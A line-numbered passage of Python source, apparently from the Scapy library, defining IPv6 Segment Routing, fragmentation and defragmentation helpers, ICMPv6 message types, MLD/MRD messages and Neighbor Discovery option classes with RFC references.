1017 name = "IPv6 Option Header Segment Routing - Egress Node TLV"
1018 # draft-ietf-6man-segment-routing-header-06 3.1.2
1019 fields_desc = [ByteEnumField("type", 2, _segment_routing_header_tlvs),
1020 ByteField("len", 18),
1021 ByteField("reserved", 0),
1022 ByteField("flags", 0),
1023 IP6Field("egress_node", "::1")]
1026class IPv6ExtHdrSegmentRoutingTLVPad1(IPv6ExtHdrSegmentRoutingTLV):
1027 name = "IPv6 Option Header Segment Routing - Pad1 TLV"
1028 # RFC8754 sect 2.1.1.1
1029 fields_desc = [ByteEnumField("type", 0, _segment_routing_header_tlvs),
1030 FieldLenField("len", None, length_of="padding", fmt="B"),
1031 StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)] # noqa: E501
1034class IPv6ExtHdrSegmentRoutingTLVPadN(IPv6ExtHdrSegmentRoutingTLV):
1035 name = "IPv6 Option Header Segment Routing - PadN TLV"
1036 # RFC8754 sect 2.1.1.2
1037 fields_desc = [ByteEnumField("type", 4, _segment_routing_header_tlvs),
1038 FieldLenField("len", None, length_of="padding", fmt="B"),
1039 StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)] # noqa: E501
1042class IPv6ExtHdrSegmentRoutingTLVHMAC(IPv6ExtHdrSegmentRoutingTLV):
1043 name = "IPv6 Option Header Segment Routing - HMAC TLV"
1044 # RFC8754 sect 2.1.2
1045 fields_desc = [ByteEnumField("type", 5, _segment_routing_header_tlvs),
1046 FieldLenField("len", None, length_of="hmac",
1047 adjust=lambda _, x: x + 48),
1048 BitField("D", 0, 1),
1049 BitField("reserved", 0, 15),
1050 IntField("hmackeyid", 0),
1051 StrLenField("hmac", "",
1052 length_from=lambda pkt: pkt.len - 48)]
1055class IPv6ExtHdrSegmentRouting(_IPv6ExtHdr):
1056 name = "IPv6 Option Header Segment Routing"
1057 # RFC8754 sect 2. + flag bits from draft 06
1058 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
1059 ByteField("len", None),
1060 ByteField("type", 4),
1061 ByteField("segleft", None),
1062 ByteField("lastentry", None),
1063 BitField("unused1", 0, 1),
1064 BitField("protected", 0, 1),
1065 BitField("oam", 0, 1),
1066 BitField("alert", 0, 1),
1067 BitField("hmac", 0, 1),
1068 BitField("unused2", 0, 3),
1069 ShortField("tag", 0),
1070 IP6ListField("addresses", ["::1"],
1071 count_from=lambda pkt: (pkt.lastentry + 1)),
1072 PacketListField("tlv_objects", [],
1073 IPv6ExtHdrSegmentRoutingTLV,
1074 length_from=lambda pkt: 8 * pkt.len - 16 * (
1075 pkt.lastentry + 1
1076 ))]
1078 overload_fields = {IPv6: {"nh": 43}}
1080 def post_build(self, pkt, pay):
1082 if self.len is None:
1084 # The extension must be align on 8 bytes
1085 tmp_mod = (-len(pkt) + 8) % 8
1086 if tmp_mod == 1:
1087 tlv = IPv6ExtHdrSegmentRoutingTLVPad1()
1088 pkt += raw(tlv)
1089 elif tmp_mod >= 2:
1090 # Add the padding extension
1091 tmp_pad = b"\x00" * (tmp_mod - 2)
1092 tlv = IPv6ExtHdrSegmentRoutingTLVPadN(padding=tmp_pad)
1093 pkt += raw(tlv)
1095 tmp_len = (len(pkt) - 8) // 8
1096 pkt = pkt[:1] + struct.pack("B", tmp_len) + pkt[2:]
1098 if self.segleft is None:
1099 tmp_len = len(self.addresses)
1100 if tmp_len:
1101 tmp_len -= 1
1102 pkt = pkt[:3] + struct.pack("B", tmp_len) + pkt[4:]
1104 if self.lastentry is None:
1105 lastentry = len(self.addresses)
1106 if lastentry == 0:
1107 warning(
1108 "IPv6ExtHdrSegmentRouting(): the addresses list is empty!"
1109 )
1110 else:
1111 lastentry -= 1
1112 pkt = pkt[:4] + struct.pack("B", lastentry) + pkt[5:]
1114 return _IPv6ExtHdr.post_build(self, pkt, pay)
1117# Fragmentation Header #
1119class IPv6ExtHdrFragment(_IPv6ExtHdr):
1120 name = "IPv6 Extension Header - Fragmentation header"
1121 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
1122 BitField("res1", 0, 8),
1123 BitField("offset", 0, 13),
1124 BitField("res2", 0, 2),
1125 BitField("m", 0, 1),
1126 IntField("id", None)]
1127 overload_fields = {IPv6: {"nh": 44}}
1129 def guess_payload_class(self, p):
1130 if self.offset > 0:
1131 return Raw
1132 else:
1133 return super(IPv6ExtHdrFragment, self).guess_payload_class(p)
1136def defragment6(packets):
1137 """
1138 Performs defragmentation of a list of IPv6 packets. Packets are reordered.
1139 Crap is dropped. What lacks is completed by 'X' characters.
1140 """
1142 # Remove non fragments
1143 lst = [x for x in packets if IPv6ExtHdrFragment in x]
1144 if not lst:
1145 return []
1147 id = lst[0][IPv6ExtHdrFragment].id
1149 llen = len(lst)
1150 lst = [x for x in lst if x[IPv6ExtHdrFragment].id == id]
1151 if len(lst) != llen:
1152 warning("defragment6: some fragmented packets have been removed from list") # noqa: E501
1154 # reorder fragments
1155 res = []
1156 while lst:
1157 min_pos = 0
1158 min_offset = lst[0][IPv6ExtHdrFragment].offset
1159 for p in lst:
1160 cur_offset = p[IPv6ExtHdrFragment].offset
1161 if cur_offset < min_offset:
1162 min_pos = 0
1163 min_offset = cur_offset
1164 res.append(lst[min_pos])
1165 del lst[min_pos]
1167 # regenerate the fragmentable part
1168 fragmentable = b""
1169 for p in res:
1170 q = p[IPv6ExtHdrFragment]
1171 offset = 8 * q.offset
1172 if offset != len(fragmentable):
1173 warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset)) # noqa: E501
1174 fragmentable += b"X" * (offset - len(fragmentable))
1175 fragmentable += raw(q.payload)
1177 # Regenerate the unfragmentable part.
1178 q = res[0].copy()
1179 nh = q[IPv6ExtHdrFragment].nh
1180 q[IPv6ExtHdrFragment].underlayer.nh = nh
1181 q[IPv6ExtHdrFragment].underlayer.plen = len(fragmentable)
1182 del q[IPv6ExtHdrFragment].underlayer.payload
1183 q /= conf.raw_layer(load=fragmentable)
1184 del q.plen
1186 if q[IPv6].underlayer:
1187 q[IPv6] = IPv6(raw(q[IPv6]))
1188 else:
1189 q = IPv6(raw(q))
1190 return q
1193def fragment6(pkt, fragSize):
1194 """
1195 Performs fragmentation of an IPv6 packet. 'fragSize' argument is the
1196 expected maximum size of fragment data (MTU). The list of packets is
1197 returned.
1199 If packet does not contain an IPv6ExtHdrFragment class, it is added to
1200 first IPv6 layer found. If no IPv6 layer exists packet is returned in
1201 result list unmodified.
1202 """
1204 pkt = pkt.copy()
1206 if IPv6ExtHdrFragment not in pkt:
1207 if IPv6 not in pkt:
1208 return [pkt]
1210 layer3 = pkt[IPv6]
1211 data = layer3.payload
1212 frag = IPv6ExtHdrFragment(nh=layer3.nh)
1214 layer3.remove_payload()
1215 del layer3.nh
1216 del layer3.plen
1218 frag.add_payload(data)
1219 layer3.add_payload(frag)
1221 # If the payload is bigger than 65535, a Jumbo payload must be used, as
1222 # an IPv6 packet can't be bigger than 65535 bytes.
1223 if len(raw(pkt[IPv6ExtHdrFragment])) > 65535:
1224 warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.") # noqa: E501
1225 return []
1227 s = raw(pkt) # for instantiation to get upper layer checksum right
1229 if len(s) <= fragSize:
1230 return [pkt]
1232 # Fragmentable part : fake IPv6 for Fragmentable part length computation
1233 fragPart = pkt[IPv6ExtHdrFragment].payload
1234 tmp = raw(IPv6(src="::1", dst="::1") / fragPart)
1235 fragPartLen = len(tmp) - 40 # basic IPv6 header length
1236 fragPartStr = s[-fragPartLen:]
1238 # Grab Next Header for use in Fragment Header
1239 nh = pkt[IPv6ExtHdrFragment].nh
1241 # Keep fragment header
1242 fragHeader = pkt[IPv6ExtHdrFragment]
1243 del fragHeader.payload # detach payload
1245 # Unfragmentable Part
1246 unfragPartLen = len(s) - fragPartLen - 8
1247 unfragPart = pkt
1248 del pkt[IPv6ExtHdrFragment].underlayer.payload # detach payload
1250 # Cut the fragmentable part to fit fragSize. Inner fragments have
1251 # a length that is an integer multiple of 8 octets. last Frag MTU
1252 # can be anything below MTU
1253 lastFragSize = fragSize - unfragPartLen - 8
1254 innerFragSize = lastFragSize - (lastFragSize % 8)
1256 if lastFragSize <= 0 or innerFragSize == 0:
1257 warning("Provided fragment size value is too low. " +
1258 "Should be more than %d" % (unfragPartLen + 8))
1259 return [unfragPart / fragHeader / fragPart]
1261 remain = fragPartStr
1262 res = []
1263 fragOffset = 0 # offset, incremeted during creation
1264 fragId = random.randint(0, 0xffffffff) # random id ...
1265 if fragHeader.id is not None: # ... except id provided by user
1266 fragId = fragHeader.id
1267 fragHeader.m = 1
1268 fragHeader.id = fragId
1269 fragHeader.nh = nh
1271 # Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ...
1272 while True:
1273 if (len(remain) > lastFragSize):
1274 tmp = remain[:innerFragSize]
1275 remain = remain[innerFragSize:]
1276 fragHeader.offset = fragOffset # update offset
1277 fragOffset += (innerFragSize // 8) # compute new one
1278 if IPv6 in unfragPart:
1279 unfragPart[IPv6].plen = None
1280 tempo = unfragPart / fragHeader / conf.raw_layer(load=tmp)
1281 res.append(tempo)
1282 else:
1283 fragHeader.offset = fragOffset # update offSet
1284 fragHeader.m = 0
1285 if IPv6 in unfragPart:
1286 unfragPart[IPv6].plen = None
1287 tempo = unfragPart / fragHeader / conf.raw_layer(load=remain)
1288 res.append(tempo)
1289 break
1290 return res
1293#############################################################################
1294#############################################################################
1295# ICMPv6* Classes #
1296#############################################################################
1297#############################################################################
1300icmp6typescls = {1: "ICMPv6DestUnreach",
1301 2: "ICMPv6PacketTooBig",
1302 3: "ICMPv6TimeExceeded",
1303 4: "ICMPv6ParamProblem",
1304 128: "ICMPv6EchoRequest",
1305 129: "ICMPv6EchoReply",
1306 130: "ICMPv6MLQuery", # MLDv1 or MLDv2
1307 131: "ICMPv6MLReport",
1308 132: "ICMPv6MLDone",
1309 133: "ICMPv6ND_RS",
1310 134: "ICMPv6ND_RA",
1311 135: "ICMPv6ND_NS",
1312 136: "ICMPv6ND_NA",
1313 137: "ICMPv6ND_Redirect",
1314 # 138: Do Me - RFC 2894 - Seems painful
1315 139: "ICMPv6NIQuery",
1316 140: "ICMPv6NIReply",
1317 141: "ICMPv6ND_INDSol",
1318 142: "ICMPv6ND_INDAdv",
1319 143: "ICMPv6MLReport2",
1320 144: "ICMPv6HAADRequest",
1321 145: "ICMPv6HAADReply",
1322 146: "ICMPv6MPSol",
1323 147: "ICMPv6MPAdv",
1324 # 148: Do Me - SEND related - RFC 3971
1325 # 149: Do Me - SEND related - RFC 3971
1326 151: "ICMPv6MRD_Advertisement",
1327 152: "ICMPv6MRD_Solicitation",
1328 153: "ICMPv6MRD_Termination",
1329 # 154: Do Me - FMIPv6 Messages - RFC 5568
1330 155: "ICMPv6RPL", # RFC 6550
1331 }
1333icmp6typesminhdrlen = {1: 8,
1334 2: 8,
1335 3: 8,
1336 4: 8,
1337 128: 8,
1338 129: 8,
1339 130: 24,
1340 131: 24,
1341 132: 24,
1342 133: 8,
1343 134: 16,
1344 135: 24,
1345 136: 24,
1346 137: 40,
1347 # 139:
1348 # 140
1349 141: 8,
1350 142: 8,
1351 143: 8,
1352 144: 8,
1353 145: 8,
1354 146: 8,
1355 147: 8,
1356 151: 8,
1357 152: 4,
1358 153: 4,
1359 155: 4
1360 }
1362icmp6types = {1: "Destination unreachable",
1363 2: "Packet too big",
1364 3: "Time exceeded",
1365 4: "Parameter problem",
1366 100: "Private Experimentation",
1367 101: "Private Experimentation",
1368 128: "Echo Request",
1369 129: "Echo Reply",
1370 130: "MLD Query",
1371 131: "MLD Report",
1372 132: "MLD Done",
1373 133: "Router Solicitation",
1374 134: "Router Advertisement",
1375 135: "Neighbor Solicitation",
1376 136: "Neighbor Advertisement",
1377 137: "Redirect Message",
1378 138: "Router Renumbering",
1379 139: "ICMP Node Information Query",
1380 140: "ICMP Node Information Response",
1381 141: "Inverse Neighbor Discovery Solicitation Message",
1382 142: "Inverse Neighbor Discovery Advertisement Message",
1383 143: "MLD Report Version 2",
1384 144: "Home Agent Address Discovery Request Message",
1385 145: "Home Agent Address Discovery Reply Message",
1386 146: "Mobile Prefix Solicitation",
1387 147: "Mobile Prefix Advertisement",
1388 148: "Certification Path Solicitation",
1389 149: "Certification Path Advertisement",
1390 151: "Multicast Router Advertisement",
1391 152: "Multicast Router Solicitation",
1392 153: "Multicast Router Termination",
1393 155: "RPL Control Message",
1394 200: "Private Experimentation",
1395 201: "Private Experimentation"}
1398class _ICMPv6(Packet):
1399 name = "ICMPv6 dummy class"
1400 overload_fields = {IPv6: {"nh": 58}}
1402 def post_build(self, p, pay):
1403 p += pay
1404 if self.cksum is None:
1405 chksum = in6_chksum(58, self.underlayer, p)
1406 p = p[:2] + struct.pack("!H", chksum) + p[4:]
1407 return p
1409 def hashret(self):
1410 return self.payload.hashret()
1412 def answers(self, other):
1413 # isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ...
1414 if (isinstance(self.underlayer, IPerror6) or
1415 isinstance(self.underlayer, _IPv6ExtHdr) and
1416 isinstance(other, _ICMPv6)):
1417 if not ((self.type == other.type) and
1418 (self.code == other.code)):
1419 return 0
1420 return 1
1421 return 0
1424class _ICMPv6Error(_ICMPv6):
1425 name = "ICMPv6 errors dummy class"
1427 def guess_payload_class(self, p):
1428 return IPerror6
1431class ICMPv6Unknown(_ICMPv6):
1432 name = "Scapy6 ICMPv6 fallback class"
1433 fields_desc = [ByteEnumField("type", 1, icmp6types),
1434 ByteField("code", 0),
1435 XShortField("cksum", None),
1436 StrField("msgbody", "")]
1439# RFC 2460 #
1441class ICMPv6DestUnreach(_ICMPv6Error):
1442 name = "ICMPv6 Destination Unreachable"
1443 fields_desc = [ByteEnumField("type", 1, icmp6types),
1444 ByteEnumField("code", 0, {0: "No route to destination",
1445 1: "Communication with destination administratively prohibited", # noqa: E501
1446 2: "Beyond scope of source address", # noqa: E501
1447 3: "Address unreachable",
1448 4: "Port unreachable"}),
1449 XShortField("cksum", None),
1450 ByteField("length", 0),
1451 X3BytesField("unused", 0),
1452 _ICMPExtensionPadField(),
1453 _ICMPExtensionField()]
1454 post_dissection = _ICMP_extpad_post_dissection
1457class ICMPv6PacketTooBig(_ICMPv6Error):
1458 name = "ICMPv6 Packet Too Big"
1459 fields_desc = [ByteEnumField("type", 2, icmp6types),
1460 ByteField("code", 0),
1461 XShortField("cksum", None),
1462 IntField("mtu", 1280)]
1465class ICMPv6TimeExceeded(_ICMPv6Error):
1466 name = "ICMPv6 Time Exceeded"
1467 fields_desc = [ByteEnumField("type", 3, icmp6types),
1468 ByteEnumField("code", 0, {0: "hop limit exceeded in transit", # noqa: E501
1469 1: "fragment reassembly time exceeded"}), # noqa: E501
1470 XShortField("cksum", None),
1471 ByteField("length", 0),
1472 X3BytesField("unused", 0),
1473 _ICMPExtensionPadField(),
1474 _ICMPExtensionField()]
1475 post_dissection = _ICMP_extpad_post_dissection
1478# The default pointer value is set to the next header field of
1479# the encapsulated IPv6 packet
1482class ICMPv6ParamProblem(_ICMPv6Error):
1483 name = "ICMPv6 Parameter Problem"
1484 fields_desc = [ByteEnumField("type", 4, icmp6types),
1485 ByteEnumField(
1486 "code", 0,
1487 {0: "erroneous header field encountered",
1488 1: "unrecognized Next Header type encountered",
1489 2: "unrecognized IPv6 option encountered",
1490 3: "first fragment has incomplete header chain"}),
1491 XShortField("cksum", None),
1492 IntField("ptr", 6)]
1495class ICMPv6EchoRequest(_ICMPv6):
1496 name = "ICMPv6 Echo Request"
1497 fields_desc = [ByteEnumField("type", 128, icmp6types),
1498 ByteField("code", 0),
1499 XShortField("cksum", None),
1500 XShortField("id", 0),
1501 XShortField("seq", 0),
1502 StrField("data", "")]
1504 def mysummary(self):
1505 return self.sprintf("%name% (id: %id% seq: %seq%)")
1507 def hashret(self):
1508 return struct.pack("HH", self.id, self.seq) + self.payload.hashret()
1511class ICMPv6EchoReply(ICMPv6EchoRequest):
1512 name = "ICMPv6 Echo Reply"
1513 type = 129
1515 def answers(self, other):
1516 # We could match data content between request and reply.
1517 return (isinstance(other, ICMPv6EchoRequest) and
1518 self.id == other.id and self.seq == other.seq and
1519 self.data == other.data)
1522# ICMPv6 Multicast Listener Discovery (RFC2710) #
1524# tous les messages MLD sont emis avec une adresse source lien-locale
1525# -> Y veiller dans le post_build si aucune n'est specifiee
1526# La valeur de Hop-Limit doit etre de 1
1527# "and an IPv6 Router Alert option in a Hop-by-Hop Options
1528# header. (The router alert option is necessary to cause routers to
1529# examine MLD messages sent to multicast addresses in which the router
1530# itself has no interest"
1531class _ICMPv6ML(_ICMPv6):
1532 fields_desc = [ByteEnumField("type", 130, icmp6types),
1533 ByteField("code", 0),
1534 XShortField("cksum", None),
1535 ShortField("mrd", 0),
1536 ShortField("reserved", 0),
1537 IP6Field("mladdr", "::")]
1539# general queries are sent to the link-scope all-nodes multicast
1540# address ff02::1, with a multicast address field of 0 and a MRD of
1541# [Query Response Interval]
1542# Default value for mladdr is set to 0 for a General Query, and
1543# overloaded by the user for a Multicast Address specific query
1544# TODO : See what we can do to automatically include a Router Alert
1545# Option in a Destination Option Header.
1548class ICMPv6MLQuery(_ICMPv6ML): # RFC 2710
1549 name = "MLD - Multicast Listener Query"
1550 type = 130
1551 mrd = 10000 # 10s for mrd
1552 mladdr = "::"
1553 overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}}
1556# TODO : See what we can do to automatically include a Router Alert
1557# Option in a Destination Option Header.
1558class ICMPv6MLReport(_ICMPv6ML): # RFC 2710
1559 name = "MLD - Multicast Listener Report"
1560 type = 131
1561 overload_fields = {IPv6: {"hlim": 1, "nh": 58}}
1563 def answers(self, query):
1564 """Check the query type"""
1565 return ICMPv6MLQuery in query
1567# When a node ceases to listen to a multicast address on an interface,
1568# it SHOULD send a single Done message to the link-scope all-routers
1569# multicast address (FF02::2), carrying in its multicast address field
1570# the address to which it is ceasing to listen
1571# TODO : See what we can do to automatically include a Router Alert
1572# Option in a Destination Option Header.
1575class ICMPv6MLDone(_ICMPv6ML): # RFC 2710
1576 name = "MLD - Multicast Listener Done"
1577 type = 132
1578 overload_fields = {IPv6: {"dst": "ff02::2", "hlim": 1, "nh": 58}}
1581# Multicast Listener Discovery Version 2 (MLDv2) (RFC3810) #
1583class ICMPv6MLQuery2(_ICMPv6): # RFC 3810
1584 name = "MLDv2 - Multicast Listener Query"
1585 fields_desc = [ByteEnumField("type", 130, icmp6types),
1586 ByteField("code", 0),
1587 XShortField("cksum", None),
1588 ShortField("mrd", 10000),
1589 ShortField("reserved", 0),
1590 IP6Field("mladdr", "::"),
1591 BitField("Resv", 0, 4),
1592 BitField("S", 0, 1),
1593 BitField("QRV", 0, 3),
1594 ByteField("QQIC", 0),
1595 ShortField("sources_number", None),
1596 IP6ListField("sources", [],
1597 count_from=lambda pkt: pkt.sources_number)]
1599 # RFC8810 - 4. Message Formats
1600 overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}}
1602 def post_build(self, packet, payload):
1603 """Compute the 'sources_number' field when needed"""
1604 if self.sources_number is None:
1605 srcnum = struct.pack("!H", len(self.sources))
1606 packet = packet[:26] + srcnum + packet[28:]
1607 return _ICMPv6.post_build(self, packet, payload)
1610class ICMPv6MLDMultAddrRec(Packet):
1611 name = "ICMPv6 MLDv2 - Multicast Address Record"
1612 fields_desc = [ByteField("rtype", 4),
1613 FieldLenField("auxdata_len", None,
1614 length_of="auxdata",
1615 fmt="B"),
1616 FieldLenField("sources_number", None,
1617 length_of="sources",
1618 adjust=lambda p, num: num // 16),
1619 IP6Field("dst", "::"),
1620 IP6ListField("sources", [],
1621 length_from=lambda p: 16 * p.sources_number),
1622 StrLenField("auxdata", "",
1623 length_from=lambda p: p.auxdata_len)]
1625 def default_payload_class(self, packet):
1626 """Multicast Address Record followed by another one"""
1627 return self.__class__
1630class ICMPv6MLReport2(_ICMPv6): # RFC 3810
1631 name = "MLDv2 - Multicast Listener Report"
1632 fields_desc = [ByteEnumField("type", 143, icmp6types),
1633 ByteField("res", 0),
1634 XShortField("cksum", None),
1635 ShortField("reserved", 0),
1636 ShortField("records_number", None),
1637 PacketListField("records", [],
1638 ICMPv6MLDMultAddrRec,
1639 count_from=lambda p: p.records_number)]
1641 # RFC8810 - 4. Message Formats
1642 overload_fields = {IPv6: {"dst": "ff02::16", "hlim": 1, "nh": 58}}
1644 def post_build(self, packet, payload):
1645 """Compute the 'records_number' field when needed"""
1646 if self.records_number is None:
1647 recnum = struct.pack("!H", len(self.records))
1648 packet = packet[:6] + recnum + packet[8:]
1649 return _ICMPv6.post_build(self, packet, payload)
1651 def answers(self, query):
1652 """Check the query type"""
1653 return isinstance(query, ICMPv6MLQuery2)
1656# ICMPv6 MRD - Multicast Router Discovery (RFC 4286) #
1658# TODO:
1659# - 04/09/06 troglocan : find a way to automatically add a router alert
1660# option for all MRD packets. This could be done in a specific
1661# way when IPv6 is the under layer with some specific keyword
1662# like 'exthdr'. This would allow to keep compatibility with
1663# providing IPv6 fields to be overloaded in fields_desc.
1664#
1665# At the moment, if user inserts an IPv6 Router alert option
1666# none of the IPv6 default values of IPv6 layer will be set.
1668class ICMPv6MRD_Advertisement(_ICMPv6):
1669 name = "ICMPv6 Multicast Router Discovery Advertisement"
1670 fields_desc = [ByteEnumField("type", 151, icmp6types),
1671 ByteField("advinter", 20),
1672 XShortField("cksum", None),
1673 ShortField("queryint", 0),
1674 ShortField("robustness", 0)]
1675 overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}}
1676 # IPv6 Router Alert requires manual inclusion
1678 def extract_padding(self, s):
1679 return s[:8], s[8:]
1682class ICMPv6MRD_Solicitation(_ICMPv6):
1683 name = "ICMPv6 Multicast Router Discovery Solicitation"
1684 fields_desc = [ByteEnumField("type", 152, icmp6types),
1685 ByteField("res", 0),
1686 XShortField("cksum", None)]
1687 overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}}
1688 # IPv6 Router Alert requires manual inclusion
1690 def extract_padding(self, s):
1691 return s[:4], s[4:]
1694class ICMPv6MRD_Termination(_ICMPv6):
1695 name = "ICMPv6 Multicast Router Discovery Termination"
1696 fields_desc = [ByteEnumField("type", 153, icmp6types),
1697 ByteField("res", 0),
1698 XShortField("cksum", None)]
1699 overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::6A"}}
1700 # IPv6 Router Alert requires manual inclusion
1702 def extract_padding(self, s):
1703 return s[:4], s[4:]
1706# ICMPv6 Neighbor Discovery (RFC 2461) #
1708icmp6ndopts = {1: "Source Link-Layer Address",
1709 2: "Target Link-Layer Address",
1710 3: "Prefix Information",
1711 4: "Redirected Header",
1712 5: "MTU",
1713 6: "NBMA Shortcut Limit Option", # RFC2491
1714 7: "Advertisement Interval Option",
1715 8: "Home Agent Information Option",
1716 9: "Source Address List",
1717 10: "Target Address List",
1718 11: "CGA Option", # RFC 3971
1719 12: "RSA Signature Option", # RFC 3971
1720 13: "Timestamp Option", # RFC 3971
1721 14: "Nonce option", # RFC 3971
1722 15: "Trust Anchor Option", # RFC 3971
1723 16: "Certificate Option", # RFC 3971
1724 17: "IP Address Option", # RFC 4068
1725 18: "New Router Prefix Information Option", # RFC 4068
1726 19: "Link-layer Address Option", # RFC 4068
1727 20: "Neighbor Advertisement Acknowledgement Option",
1728 21: "CARD Request Option", # RFC 4065/4066/4067
1729 22: "CARD Reply Option", # RFC 4065/4066/4067
1730 23: "MAP Option", # RFC 4140
1731 24: "Route Information Option", # RFC 4191
1732 25: "Recursive DNS Server Option",
1733 26: "IPv6 Router Advertisement Flags Option"
1734 }
1736icmp6ndoptscls = {1: "ICMPv6NDOptSrcLLAddr",
1737 2: "ICMPv6NDOptDstLLAddr",
1738 3: "ICMPv6NDOptPrefixInfo",
1739 4: "ICMPv6NDOptRedirectedHdr",
1740 5: "ICMPv6NDOptMTU",
1741 6: "ICMPv6NDOptShortcutLimit",
1742 7: "ICMPv6NDOptAdvInterval",
1743 8: "ICMPv6NDOptHAInfo",
1744 9: "ICMPv6NDOptSrcAddrList",
1745 10: "ICMPv6NDOptTgtAddrList",
1746 # 11: ICMPv6NDOptCGA, RFC3971 - contrib/send.py
1747 # 12: ICMPv6NDOptRsaSig, RFC3971 - contrib/send.py
1748 # 13: ICMPv6NDOptTmstp, RFC3971 - contrib/send.py
1749 # 14: ICMPv6NDOptNonce, RFC3971 - contrib/send.py
1750 # 15: Do Me,
1751 # 16: Do Me,
1752 17: "ICMPv6NDOptIPAddr",
1753 18: "ICMPv6NDOptNewRtrPrefix",
1754 19: "ICMPv6NDOptLLA",
1755 # 18: Do Me,
1756 # 19: Do Me,
1757 # 20: Do Me,
1758 # 21: Do Me,
1759 # 22: Do Me,
1760 23: "ICMPv6NDOptMAP",
1761 24: "ICMPv6NDOptRouteInfo",
1762 25: "ICMPv6NDOptRDNSS",
1763 26: "ICMPv6NDOptEFA",
1764 31: "ICMPv6NDOptDNSSL",
1765 37: "ICMPv6NDOptCaptivePortal",
1766 38: "ICMPv6NDOptPREF64",
1767 }
1769icmp6ndraprefs = {0: "Medium (default)",
1770 1: "High",
1771 2: "Reserved",
1772 3: "Low"} # RFC 4191
1775class _ICMPv6NDGuessPayload:
1776 name = "Dummy ND class that implements guess_payload_class()"
1778 def guess_payload_class(self, p):
1779 if len(p) > 1:
1780 return icmp6ndoptscls.get(orb(p[0]), ICMPv6NDOptUnknown)
1783# Beginning of ICMPv6 Neighbor Discovery Options.
1785class ICMPv6NDOptDataField(StrLenField):
1786 __slots__ = ["strip_zeros"]
1788 def __init__(self, name, default, strip_zeros=False, **kwargs):
1789 super().__init__(name, default, **kwargs)
1790 self.strip_zeros = strip_zeros
1792 def i2len(self, pkt, x):
1793 return len(self.i2m(pkt, x))
1795 def i2m(self, pkt, x):
1796 r = (len(x) + 2) % 8
1797 if r:
1798 x += b"\x00" * (8 - r)
1799 return x
1801 def m2i(self, pkt, x):
1802 if self.strip_zeros:
1803 x = x.rstrip(b"\x00")
1804 return x
1807class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet):
1808 name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented"
1809 fields_desc = [ByteField("type", 0),
1810 FieldLenField("len", None, length_of="data", fmt="B",
1811 adjust=lambda pkt, x: (2 + x) // 8),
1812 ICMPv6NDOptDataField("data", "", strip_zeros=False,
1813 length_from=lambda pkt:
1814 8 * max(pkt.len, 1) - 2)]
1816# NOTE: len includes type and len field. Expressed in unit of 8 bytes
1817# TODO: Revoir le coup du ETHER_ANY
1820class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet):
1821 name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address"
1822 fields_desc = [ByteField("type", 1),
1823 ByteField("len", 1),
1824 MACField("lladdr", ETHER_ANY)]
1826 def mysummary(self):
1827 return self.sprintf("%name% %lladdr%")
1830class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr):
1831 name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address"
1832 type = 2
1835class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet):
1836 name = "ICMPv6 Neighbor Discovery Option - Prefix Information"
1837 fields_desc = [ByteField("type", 3),
1838 ByteField("len", 4),
1839 ByteField("prefixlen", 64),
1840 BitField("L", 1, 1),
1841 BitField("A", 1, 1),
1842 BitField("R", 0, 1),
1843 BitField("res1", 0, 5),
1844 XIntField("validlifetime", 0xffffffff),
1845 XIntField("preferredlifetime", 0xffffffff),
1846 XIntField("res2", 0x00000000),
1847 IP6Field("prefix", "::")]
1849 def mysummary(self):
1850 return self.sprintf("%name% %prefix%/%prefixlen% "
1851 "On-link %L% Autonomous Address %A% "
1852 "Router Address %R%")
1854# TODO: We should also limit the size of included packet to something
1855# like (initiallen - 40 - 2)
1858class TruncPktLenField(PacketLenField):
1859 def i2m(self, pkt, x):
1860 s = bytes(x)
1861 tmp_len = len(s)
1862 return s[:tmp_len - (tmp_len % 8)]
1864 def i2len(self, pkt, i):
1865 return len(self.i2m(pkt, i))
1868class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet):
1869 name = "ICMPv6 Neighbor Discovery Option - Redirected Header"
1870 fields_desc = [ByteField("type", 4),
1871 FieldLenField("len", None, length_of="pkt", fmt="B",
1872 adjust=lambda pkt, x: (x + 8) // 8),
1873 MayEnd(StrFixedLenField("res", b"\x00" * 6, 6)),
1874 TruncPktLenField("pkt", b"", IPv6,
1875 length_from=lambda pkt: 8 * pkt.len - 8)]
1877# See which value should be used for default MTU instead of 1280
1880class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet):
1881 name = "ICMPv6 Neighbor Discovery Option - MTU"
1882 fields_desc = [ByteField("type", 5),
1883 ByteField("len", 1),
1884 XShortField("res", 0),
1885 IntField("mtu", 1280)]
1887 def mysummary(self):
1888 return self.sprintf("%name% %mtu%")
1891class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet): # RFC 2491
1892 name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit"
1893 fields_desc = [ByteField("type", 6),
1894 ByteField("len", 1),
1895 ByteField("shortcutlim", 40), # XXX
1896 ByteField("res1", 0),
1897 IntField("res2", 0)]
1900class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet):
1901 name = "ICMPv6 Neighbor Discovery - Interval Advertisement"
1902 fields_desc = [ByteField("type", 7),
1903 ByteField("len", 1),
1904 ShortField("res", 0),
1905 IntField("advint", 0)]
1907 def mysummary(self):
1908 return self.sprintf("%name% %advint% milliseconds")
